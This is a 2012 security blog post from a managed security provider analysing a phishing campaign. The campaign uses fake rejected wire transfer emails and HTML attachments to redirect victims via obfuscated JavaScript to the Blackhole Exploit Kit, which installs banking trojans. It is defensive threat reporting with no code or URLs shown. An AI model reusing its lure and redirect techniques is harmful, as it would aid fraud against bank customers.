Home / Resource Center / Blog / Rejected Wire Transfer Leads to Blackhole Exploit Kit

Rejected Wire Transfer Leads to Blackhole Exploit Kit

Jeremy Scott

Jeremy Scott    |    July 19, 2012

The Solutionary Security Engineering Research Team (SERT) has been receiving a significant amount of malicious emails luring would-be victims to hosts running the Blackhole Exploit Kit.

The emails claim to be related to a rejected wire transfer. SERT has observed that the malicious emails use an embedded hyperlink or an attached HTML file attachment. The hyperlink points to a compromised website, usually running a piece of obfuscated javascript that is decoded as an iframe. The iframe redirects the victim’s browser to a Blackhole landing page that attempts to exploit the victim’s computer and install additional malware such as Gameover Zeus, Cridex, or some other variant.

Gameover Zeus and Cridex are popular banking Trojans that steal victim’s bank account information to be used to make fraudulent charges on the victims’ accounts.

As usual, the danger comes not from the email itself, but from the referenced site that holds the Blackhole Exploit Kit. If you click on the link and proceed to the page, you are in danger of infection from additional malware and account compromise.

The following image is an example of an email with the embedded hyperlink.

describe the image

The following image is another example received that had an attached HTML file. The file attached to the email had the filename Wire_NFED_Rejected.htm. Instead of linking to a compromised website for redirection to the Blackhole Exploit Kit landing page, the attachment contains a direct link to the landing page.


describe the image
The subject lines used in the malicious spam campaign can vary, but are all related to a "Wire Transfer Confirmation". The reference number enclosed in the parenthesis varies or is completely nonexistent.

If a victim clicks on the hyperlink or opens the file attachment, they will be displayed with page in their browser with the following message:

"Please wait a moment. You will be forwarded...".

The underlying HTML code of the page contains an obfuscated javascript that appears to be a series of random numbers.


describe the image

The following image displays part of the deobfuscated code. The script is run by the victim’s browser and redirected to the Blackhole Exploit Kit landing page.


describe the image

I continue to stress the same recommendations when dealing with suspicious emails.

  • Don't respond to suspicious e-mails.
  • Don't click links in suspicious e-mails.
  • Delete suspicious e-mails and move on.

At Solutionary we advise our clients of data security good practices such as these, as well as alert them of recent vulnerabilities through research done by our Security Engineering Research Team (SERT).


See how Solutionary managed security services based on the patented ActiveGuard® Security Compliance Platform combine security intelligence and expertise to provide visibility, threat detection and event response.

POST A COMMENT

Name
Email
Comment
<< All Entries

Solutionary is a leading managed security service provider. The company reduces the information security and compliance burden, providing flexible security services that work the way clients want; enhancing existing initiatives, infrastructure and personnel. This blog is a place to learn about, and discuss, a wide variety of security and compliance topics.

LATEST TWEETS